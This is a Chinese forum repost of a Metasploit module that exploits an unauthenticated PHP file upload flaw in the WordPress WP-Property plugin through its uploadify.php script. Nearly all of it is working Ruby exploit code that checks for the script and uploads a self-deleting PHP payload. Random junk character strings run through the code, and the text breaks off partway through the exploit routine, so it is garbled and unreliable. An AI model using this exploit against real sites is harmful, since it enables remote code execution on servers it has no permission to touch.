标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页] 作者: admin 时间: 2013-1-4 19:51 标题: WordPress WP-Property PHP 文件上传漏洞 WordPress WP-Property PHP 文件上传漏洞 * ]! ~1 J2 M' s 9 k; J5 l4 j' r4 O: f0 Q& k: d ## # This file is part of the Metasploit Framework and may be subject to$ v- k6 C: u m* k
& I( m% ?: |( P+ t# redistribution and commercial restrictions. Please see the Metasploit; t- [3 v3 y l- L" u7 l i' Z g
2 D. `( q! @* b- @' u, w( V
# Framework web site for more information on licensing and terms of use. 1 n1 C# c) U( y9 N# K3 M1 O6 p6 u. X- m
# http://metasploit.com/framework/ ## ; }' l! X9 \# n0 h+ P/ G; Y. s# K6 n3 u% ~9 N' \3 R
' n; Y7 `5 l1 j' \! e% a ~" c: [" ^4 x' \7 c `& c- M' G+ ~4 N- Z
2 ~- c/ [6 z! P: U( _9 x4 Z3 Irequire 'msf/core' ' T" m+ I/ M* M; J! Nrequire 'msf/core/exploit/php_exe' 2 q6 b, d& o* J+ v o$ c6 a Z! j$ a- m2 u& r
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit:hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',! V4 e* {, B) U. ?0 B0 i
'Description' => %q{ % t, W$ B% B) O* Z9 FThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => 9 C* q8 {- H) _# R[ 6 O& v$ r/ j! X4 F4 P* N. r'Sammy FORGIT', # initial discovery , m, T6 ~1 t% x! @" `% p3 G'James Fitts <fitts.james[at]gmail.com>' # metasploit module $ g' t! Z7 z3 o! P M],! F$ E+ ~1 K5 M' b
'License' => MSF_LICENSE," H( D6 e, b* E8 V7 A/ c. p
'References' => / l }+ R1 P/ C$ B) q[9 J- w! z1 ~0 ^7 S) s3 q' m2 X# `2 ~
[ 'OSVDB', '82656' ], ' V- u; j: h% z" \5 S[ 'BID', '53787' ],: k$ Z0 R/ u7 S9 o+ l
[ 'EDB', '18987'],5 n' ^2 ]: A) i% L/ d: A
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ] 9 H9 O' L$ j! {% U, V2 T) c N7 k], % a/ `* y) g! ]8 R+ M'Payload' =>. J4 G% R4 T: V% c9 I7 m2 [3 ~6 J
{ / p, B4 L: ?+ Z'BadChars' => "\x00",3 r K; x, f+ V
},( |7 u5 ~" |3 ?3 r& x: r ]4 }* W1 W9 R
'Platform' => 'php',2 c8 N8 T3 g+ X) U; m) S; @
'Arch' => ARCH_PHP, 4 q# M5 s0 e8 F- H2 g& h& X- J'Targets' => ) }" p9 t* Z/ T0 S' J% e[ : H: L+ g) ^" z' S# z7 K[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], 7 \. O% E9 @* R5 W9 Z, N) |[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] 0 P$ E3 q: w' C( D], $ s7 ^& Z/ H; _0 o$ W'DefaultTarget' => 0, $ p7 s# c6 o* r0 d/ n+ [" c; z'DisclosureDate' => 'Mar 26 2012')) $ U+ T! d5 X" ? _- T; m+ H ) O/ f" h X: M! z* Tregister_options( 5 b- [+ U0 e# s# ~" k[8 z r% ~* g( n. [
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])3 L4 ~+ ~. Y4 r# ]) c
], self.class) " {0 g1 u1 T" R* B ^, n# jend! K( P1 c8 p1 I) y: c7 b; j8 d0 v
4 f5 }, w3 w; O) mdef check# H6 B! w7 i4 p( E
uri = target_uri.path$ Q7 M, ~* m5 ]* Y8 p' ~
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',* e4 y$ q8 U- s0 H
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"( V3 K7 u' y5 z8 X
}) 8 x7 W" e, |: p+ D; m7 N( ] 8 ?7 i: r+ Z, U" ^6 Lif not res or res.code != 200 . f( {% r4 c1 Preturn Exploit::CheckCode::Unknown 9 E4 r9 S2 X' C; J1 o8 G2 [end2 P! T, }3 V! E7 g. |
2 C! V5 o* M: @# ?1 {; y
return Exploit::CheckCode::Appears 4 M4 d1 W+ ^# n4 U4 R' z/ cend 5 A4 M: E! k! \1 M- a ( u7 h/ H3 E i( I! [, rdef exploit " \; I5 u9 R# [uri = target_uri.path( b& @9 y* \" m- g2 W# s% W
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) 6 ?/ p/ Q3 B7 ?6 L& S8 H/ J 6 Q9 n6 x. G# Ydata = Rex::MIME::Message.new+ S% f- {- q5 ]2 Y p: r M
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")- S9 T; o* \6 T+ Q9 n9 S# s
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"") : N0 x7 P. V1 b+ J8 S. Q4 \# xpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') 4 M6 p# E U6 C$ p1 p, N$ o3 ^ / I( u0 g9 ] F7 y, Bprint_status("#{peer} - Uploading payload #{@payload_name}")3 E. m! z5 H; t9 U! W- \
res = send_request_cgi({0 r9 B t$ A- X
'method' => 'POST',0 `3 x- g2 U) X/ P, U$ q& Q
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", 2 Z6 V% m5 r. j, F$ C'ctype' => "multipart/form-data; boundary=#{data.bound}",& F+ }2 U: v! L* l- X* j
'data' => post_data/ ^1 X; b2 E; H6 V) h6 D9 E7 I
}) ! V; V# s# B \- i$ r( R/ P' w% r( W2 s7 D& O' |4 w G; q
if not res or res.code != 200 or res.body !~ /#{@payload_name}/ 1 z H6 e; {) f. z3 qfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")% W7 z4 X, M) Y! i6 q
end {! M0 U) ]+ Y+ `8 h+ C7 T R0 W% ~* w! n6 n6 v
upload_uri = res.body4 k8 q V! M3 H+ A r. T